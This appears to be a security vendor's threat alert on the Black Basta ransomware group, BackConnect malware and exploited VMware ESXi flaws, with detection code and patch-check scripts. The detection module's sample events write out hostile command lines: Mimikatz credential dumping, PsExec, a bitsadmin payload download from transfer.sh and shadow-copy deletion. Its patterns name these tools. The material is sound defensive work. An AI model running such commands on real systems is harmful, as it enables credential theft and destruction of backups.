Black Basta Leaked Chats, BackConnect Malware & VMware vulnerabilities

In recent weeks, internal communications from the Black Basta ransomware group have been leaked, revealing crucial information about their tactics, techniques, and the vulnerabilities they exploit during attacks. Security vendors and researchers have since analysed these communications, and one of the most notable findings is a list of 62 CVEs (Common Vulnerabilities and Exposures) that Black Basta has used and continues to exploit in its operations. Separately, Broadcom has released a new VMware advisory covering critical vulnerabilities in VMware ESXi, Workstation, Fusion and related products that are already being exploited in the wild.

Threat alert
March 5, 2025

Black Basta Description:

Black Basta first emerged in April 2022, with researchers speculating that it was formed by former members of the Conti and REvil ransomware gangs. Operating under the Ransomware-as-a-Service (RaaS) model, Black Basta follows a double-extortion strategy: it exfiltrates and encrypts data, then threatens to publish the stolen data unless a ransom is paid. The group mainly targets high-revenue companies in industries that are likely to handle sensitive data.

Black Basta’s operations involve a sophisticated attack chain that starts with initial access via RD Web and VPNs. One of the group’s most recent techniques is email bombing: flooding a target’s mailbox with spam, then contacting the user over Microsoft Teams while posing as help desk staff offering to fix the problem. The aim is to persuade the user to grant initial access through Remote Monitoring and Management (RMM) or remote-assistance tools.

Black Basta has been observed scanning for internet-facing vulnerabilities in services such as Jenkins CI/CD, VMware ESXi, Citrix gateways, and VPNs with weak or default credentials. The group also uses widely available file-sharing services (e.g., transfer.sh, temp.sh) to host malicious payloads, which reduces the need for custom infrastructure and lets payload downloads blend in with legitimate traffic.

Black Basta uses ZoomInfo to profile potential victims, gaining insight into an organisation’s size, structure and potential weak points. This allows the group to tailor its ransom demands to the victim’s financial standing and perceived ability to pay.

Attack Chain

Spearphishing remains the primary method for gaining initial access, with Black Basta frequently using Qakbot as the loader. Once inside a network, the group runs the SoftPerfect Network Scanner (netscan.exe) for reconnaissance and credential-dumping tools such as Mimikatz to harvest passwords and hashes. For lateral movement it relies on BITSAdmin, PsExec and RDP, which let it spread through the network and reach critical systems and data.

Data is exfiltrated before encryption; Black Basta then encrypts files and appends the “.basta” extension. To hinder recovery, vssadmin.exe is used to delete Volume Shadow Copies, removing the local snapshots a victim could otherwise roll back to.
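Detection logic for the chain described above, as an added example (not code from Socura or any vendor named in this alert): a small rule set run over constructed Windows process-creation events using Sysmon Event ID 1 field names, covering netscan.exe, Mimikatz, PsExec, BITSAdmin, RDP client use and shadow-copy deletion. It generalises slightly beyond the text by also matching the vssadmin resize and wmic shadowcopy variants, which cause the same loss of Volume Shadow Copies. Hostnames, users, paths and the download URL in the sample events are invented.

```python
"""Rules to flag Black Basta-style post-exploitation tooling in Windows
process-creation telemetry. Added example for this alert, not code from
Socura or any vendor. Field names (Computer, User, Image, CommandLine) follow
Sysmon Event ID 1 as most SIEMs ingest it; the events below are constructed.
"""
import re

# (rule name, pattern). Each pattern runs over "Image|CommandLine" so a rule
# can key on the binary path, the arguments, or both. The stage prefix
# (recon_, cred_, lateral_, impact_) shows how far the chain has progressed.
RULES = [
    ("recon_netscan",      r"\\netscan(?:64)?\.exe"),
    ("cred_mimikatz",      r"mimikatz|sekurlsa::|lsadump::"),
    ("lateral_psexec",     r"\\psexec(?:64)?\.exe|\\psexesvc\.exe"),
    ("lateral_bitsadmin",  r"\\bitsadmin\.exe.*/transfer\b"),
    ("lateral_rdp_client", r"\\mstsc\.exe.*\s/v:"),
    # Shadow-copy destruction: the alert names vssadmin delete; the resize
    # and wmic variants reach the same end and are included as a generalisation.
    ("impact_vss_delete",  r"\\vssadmin\.exe.*\bdelete\b.*\bshadows\b"),
    ("impact_vss_resize",  r"\\vssadmin\.exe.*\bresize\b.*\bshadowstorage\b"),
    ("impact_wmic_shadow", r"\\wmic\.exe.*\bshadowcopy\b.*\bdelete\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def classify_event(event):
    """Return the list of rule names that match one process-creation event."""
    haystack = f"{event.get('Image', '')}|{event.get('CommandLine', '')}"
    return [name for name, rx in COMPILED if rx.search(haystack)]


def scan(events):
    """Return (Computer, User, rule names, CommandLine) for every hit."""
    hits = []
    for ev in events:
        names = classify_event(ev)
        if names:
            hits.append((ev["Computer"], ev["User"], names, ev["CommandLine"]))
    return hits


def stages_seen(events):
    """Which stages of the chain (recon/cred/lateral/impact) appear at all."""
    return {name.split("_", 1)[0]
            for _, _, names, _ in scan(events) for name in names}


# Constructed sample telemetry (hostnames, users, paths and URL are invented).
SAMPLE_EVENTS = [
    {"Computer": "WS042", "User": "CORP\\jdoe",
     "Image": r"C:\Users\Public\netscan.exe",
     "CommandLine": r"netscan.exe /hide /auto:C:\Users\Public\scan.xml"},
    {"Computer": "WS042", "User": "CORP\\jdoe",
     "Image": r"C:\Windows\Temp\x64\mimikatz.exe",
     "CommandLine": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Computer": "WS042", "User": "CORP\\jdoe",
     "Image": r"C:\Windows\Temp\PsExec64.exe",
     "CommandLine": r"PsExec64.exe \\FS01 -accepteula -s -d cmd /c whoami"},
    {"Computer": "FS01", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high "
                    r"http://transfer.sh/get/x/a.exe C:\Windows\Temp\a.exe"},
    {"Computer": "FS01", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "WS042", "User": "CORP\\jdoe",   # benign control event
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
]

if __name__ == "__main__":
    for computer, user, names, cmd in scan(SAMPLE_EVENTS):
        print(f"{computer} {user} {','.join(names)}: {cmd}")
    print("stages:", sorted(stages_seen(SAMPLE_EVENTS)))
```

Each rule keys on the binary path and the arguments together, so the vssadmin rule still fires when the command line omits the .exe suffix, and the stage prefix of the rule name lets an analyst see at a glance whether a host has only reached reconnaissance or already shows impact. Renamed binaries defeat the path-based rules; pair them with hash or import-based detections in production.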

Vulnerabilities exploited by Black Basta

Some of the flaws that Black Basta targets are long-known, widespread vulnerabilities, including:

  • CVE-2022-30190: Follina, a flaw in the Microsoft Support Diagnostic Tool (MSDT) that enables remote code execution when a crafted Office document is opened.
  • CVE-2021-44228: The infamous Log4Shell flaw in Log4j.
  • CVE-2022-22965: The Spring4Shell vulnerability in the Spring Framework.
  • CVE-2022-41040, CVE-2022-41082: The ProxyNotShell vulnerabilities affecting Microsoft Exchange.

However, what is particularly concerning is that Black Basta is quick to discuss newly disclosed vulnerabilities, sometimes before they are officially published or before a patch is widely deployed. Recent examples include:

  • CVE-2024-23113: A format-string vulnerability in Fortinet FortiOS.
  • CVE-2024-25600: An unauthenticated remote code execution flaw in the Bricks Builder WordPress theme.
  • CVE-2023-42115: An out-of-bounds write in the Exim mail server’s external authentication.

A full list of the CVEs can be found here.

BackConnect, threat actor Cactus & VMware vulnerabilities

Recently, several researchers have observed a new malware sample dubbed BackConnect that contains artefacts referencing QakBot. BackConnect acts as a proxy for remote access to compromised servers and supports DNS tunnelling. Both QakBot and BackConnect are associated with Black Basta, but the same tooling overlaps with the newer Cactus ransomware group: Trend Micro has observed Cactus using the same social engineering tactics, command-and-control infrastructure and attack flow associated with Black Basta.

Most notably, Trend Micro’s incident response team observed an ESXi host compromise in which the binary socks.out was deployed, after which further SSH sessions as the root user were established on the host. VMware products have been targeted by threat actors before, and Broadcom has now released another advisory (VMSA-2025-0004) for three VMware vulnerabilities that are confirmed to be exploited in the wild.

VMCI heap-overflow vulnerability – CVE-2025-22224 (CVSS score: 9.3) – A Time-of-Check Time-of-Use (TOCTOU) flaw in the Virtual Machine Communication Interface that leads to an out-of-bounds write. An attacker with local administrative privileges inside a guest virtual machine can exploit it to execute code as that VM’s VMX process on the host, i.e. a guest-to-host escape.

VMware ESXi arbitrary write vulnerability – CVE-2025-22225 (CVSS score: 8.2) – An arbitrary kernel write that an attacker who already controls the VMX process can use to escape the VMX sandbox; chained after CVE-2025-22224 it completes the path from guest to hypervisor.

HGFS information-disclosure vulnerability – CVE-2025-22226 (CVSS score: 7.1) – An out-of-bounds read in the Host-Guest File System (HGFS) that lets an attacker with administrative privileges in a virtual machine leak memory from the VMX process.

Affected products are VMware ESXi, VMware Workstation Pro / Player (Workstation), VMware Fusion, VMware Cloud Foundation, and VMware Telco Cloud Platform. The vulnerable versions and the builds that fix them are listed below:

  • VMware ESXi 8.0 – Fixed in ESXi80U3d-24585383, ESXi80U2d-24585300
  • VMware ESXi 7.0 – Fixed in ESXi70U3s-24585291
  • VMware Workstation 17.x – Fixed in 17.6.3
  • VMware Fusion 13.x – Fixed in 13.6.3
  • VMware Cloud Foundation 5.x – Async patch to ESXi80U3d-24585383
  • VMware Cloud Foundation 4.x – Async patch to ESXi70U3s-24585291
  • VMware Telco Cloud Platform 5.x, 4.x, 3.x, 2.x – Fixed in ESXi 7.0U3s, ESXi 8.0U2d, and ESXi 8.0U3d
  • VMware Telco Cloud Infrastructure 3.x, 2.x – Fixed in ESXi 7.0U3s
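A fleet check against the fixed builds listed above, as an added example rather than Broadcom tooling: it parses the `VMware ESXi <version> build-<number>` line that `vmware -v` prints on a host (the input strings below are constructed) and compares the build against the first fixed build for that release line. The treatment of a release line not in the list (ESXi 8.0 GA/U1, 7.0 GA/U1/U2) as having no in-place fix and needing a move to a fixed line is my reading of the advisory list, not a statement from it. Because VMware Cloud Foundation and Telco Cloud hosts are fixed by the same ESXi builds, the same check applies to them.

```python
"""Check whether ESXi hosts report a build at or above the fix for
CVE-2025-22224 / CVE-2025-22225 / CVE-2025-22226. Added example for this
alert, not Broadcom tooling. Fixed build numbers are those in the advisory
list above; the `vmware -v` strings used as input are constructed.
"""
import re

# "major.minor.update" -> first fixed build, from the advisory list.
# Only these three release lines received an in-place patch (assumption:
# 8.0 GA/U1 and 7.0 GA/U1/U2 hosts must move to one of these lines).
FIXED_BUILDS = {
    "8.0.3": 24585383,  # ESXi80U3d-24585383
    "8.0.2": 24585300,  # ESXi80U2d-24585300
    "7.0.3": 24585291,  # ESXi70U3s-24585291
}

# Matches e.g. "VMware ESXi 8.0.3 build-24585383" as printed by `vmware -v`.
_VMWARE_V = re.compile(r"VMware ESXi (\d+\.\d+\.\d+) build-(\d+)")


def parse_vmware_v(output):
    """Return (version, build) from one line of `vmware -v` output."""
    m = _VMWARE_V.search(output)
    if not m:
        raise ValueError(f"unrecognised version string: {output!r}")
    return m.group(1), int(m.group(2))


def assess(version, build):
    """Return 'patched', 'vulnerable' or 'unsupported_line'.

    Build numbers only increase within a release line, so any later roll-up
    on the same line (e.g. a subsequent 8.0 U3 patch) also counts as fixed.
    """
    fixed = FIXED_BUILDS.get(version)
    if fixed is None:
        return "unsupported_line"
    return "patched" if build >= fixed else "vulnerable"


def assess_output(output):
    """Convenience wrapper: `vmware -v` text in, status out."""
    return assess(*parse_vmware_v(output))


def fleet_report(outputs):
    """outputs: {hostname: `vmware -v` text}. Returns {hostname: status}."""
    return {host: assess_output(text) for host, text in outputs.items()}


# Constructed inventory (hostnames invented; builds below the fix are
# deliberately lower numbers, not claims about specific releases).
SAMPLE_FLEET = {
    "esx01": "VMware ESXi 8.0.3 build-24585383",  # exactly the fixed build
    "esx02": "VMware ESXi 8.0.3 build-24400000",  # 8.0 U3 line, pre-fix
    "esx03": "VMware ESXi 8.0.2 build-24585300",  # 8.0 U2d
    "esx04": "VMware ESXi 7.0.3 build-23700000",  # 7.0 U3 line, pre-fix
    "esx05": "VMware ESXi 8.0.1 build-21000000",  # 8.0 U1: no in-place fix
}

if __name__ == "__main__":
    for host, status in sorted(fleet_report(SAMPLE_FLEET).items()):
        print(f"{host}: {status}")
```

On a real estate the `vmware -v` text would be collected per host over SSH or via the vSphere API’s `config.product.build`; the comparison is keyed on the release line first precisely because build numbers are comparable only within a line, so a U2 build must never be judged against the U3 fix.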

Mitigations

  1. Update Software and Firmware: Apply patches for operating systems, software, and firmware immediately after release. Prioritise entries in CISA’s Known Exploited Vulnerabilities (KEV) catalogue, which now include the three VMware CVEs above.
  2. Implement Multi-Factor Authentication (MFA): Employ phishing-resistant MFA for all critical services, including VPN and RD Web access.
  3. Secure Remote Access: Follow best practices for securing remote access services. Assess the use of RMM tools in your organisation, disable unnecessary RDP exposure, and monitor the usage of the tools you do allow.
  4. Backups: Ensure that critical systems and configurations are backed up regularly to offline or immutable storage, since Volume Shadow Copies will be deleted, and test restores.

Here at Socura we are focusing on proactive threat hunts and creating rules to detect malicious activities and threat actor behaviour.